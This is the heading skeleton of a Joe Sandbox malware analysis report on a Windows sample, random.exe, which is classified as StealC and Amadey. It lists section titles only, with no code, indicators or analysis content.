This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report random.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
random.exe